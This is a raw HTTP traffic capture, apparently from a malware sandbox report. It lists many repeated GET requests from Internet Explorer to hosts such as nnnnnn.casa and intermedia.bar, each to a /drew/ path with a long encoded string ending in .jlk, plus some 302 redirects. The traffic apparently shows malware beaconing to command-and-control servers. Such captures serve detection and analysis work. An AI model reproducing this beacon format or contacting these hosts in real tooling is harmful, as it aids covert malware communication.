                  Timestamp: Jan 21, 2022 07:53:21.753691912 CET | kBytes transferred: 1872 | Direction: OUT | Data:
                  GET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Timestamp: Jan 21, 2022 07:53:23.926692963 CET | kBytes transferred: 10768 | Direction: IN | Data:
                  HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:23 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 313
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk'>Found</a>.


                  Session ID: 16 | Source IP: 192.168.2.3 | Source Port: 49812 | Destination IP: 198.54.117.218 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:22.248538971 CET | kBytes transferred: 1897 | Direction: OUT | Data:
                  GET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session ID: 17 | Source IP: 192.168.2.3 | Source Port: 49814 | Destination IP: 198.54.117.211 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:22.270560026 CET | kBytes transferred: 1898 | Direction: OUT | Data:
                  GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session ID: 18 | Source IP: 192.168.2.3 | Source Port: 49813 | Destination IP: 198.54.117.211 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:22.431092024 CET | kBytes transferred: 2966 | Direction: OUT | Data:
                  GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session ID: 19 | Source IP: 192.168.2.3 | Source Port: 49815 | Destination IP: 198.54.117.211 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:22.757133961 CET | kBytes transferred: 5712 | Direction: OUT | Data:
                  GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49746 | Destination IP: 31.41.46.120 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:52:31.905735016 CET | kBytes transferred: 1136 | Direction: OUT | Data:
                  GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID: 20 | Source IP: 192.168.2.3 | Source Port: 49819 | Destination IP: 198.54.117.210 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:24.126190901 CET | kBytes transferred: 10770 | Direction: OUT | Data:
                  GET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session ID: 21 | Source IP: 192.168.2.3 | Source Port: 49817 | Destination IP: 198.54.117.210 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:24.130305052 CET | kBytes transferred: 10770 | Direction: OUT | Data:
                  GET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  22 | 192.168.2.3 | 49847 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:51.879244089 CET12339OUTGET /drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7CusLE4kewLdgn0o2N/oqWX0BcSxplHN_2B/LanESZOKp7dQPeh/Bo8uTaavu_2Ft_2Fbr/wQ7_2Bk2J/05dRSkDLS9N7xl3W_2Bf/AbGuWE5_2Fe2HMgSOVJ/9yz_2BMUIlCumYQTU9_2FK/3J_2FJB7d5R8b/4SQYH3gS/rRcCSRSB5b0qKURrLfmKh6H/GM_2F3Wo_2/F.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  23 | 192.168.2.3 | 49848 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.115874052 CET12341OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  24 | 192.168.2.3 | 49850 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.129216909 CET12342OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  25 | 192.168.2.3 | 49853 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.158545017 CET12343OUTGET /drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3wnTfM22OhIhFDrhX/abhGbeDg_2/F32j7cFeBDC9GyCao/m10xhdMb4CCa/7HwtF9C64_2/F3b31QlJIQy42X/zsnIbRG3JRJ596u8kc4vW/CJEx7Xa659BvZ2yV/10sCxMgGuLgu5f6/Z9JRI8lQTnPNjwZZMu/mc129Uq8I/WlhkxbiPfyst/snQ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  26 | 192.168.2.3 | 49849 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.176908016 CET12344OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  27 | 192.168.2.3 | 49851 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.189969063 CET12345OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  28 | 192.168.2.3 | 49854 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.311357975 CET12346OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  29 | 192.168.2.3 | 49856 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.318907976 CET12347OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.3 | 49747 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:52:31.968349934 CET1136OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  30 | 192.168.2.3 | 49855 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.377352953 CET12348OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  31 | 192.168.2.3 | 49857 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.385299921 CET12349OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  32 | 192.168.2.3 | 49858 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.509434938 CET12351OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  33 | 192.168.2.3 | 49861 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.512000084 CET12351OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  34 | 192.168.2.3 | 49859 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.576872110 CET12353OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  35 | 192.168.2.3 | 49862 | 31.41.46.120 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:53:53.706053019 CET12354OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  36 | 192.168.2.3 | 49864 | 162.255.119.177 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 21, 2022 07:54:16.363537073 CET12356OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:16.797559977 CET12357OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:18.937757015 CET12358INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:18 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 321
                  Connection: keep-alive
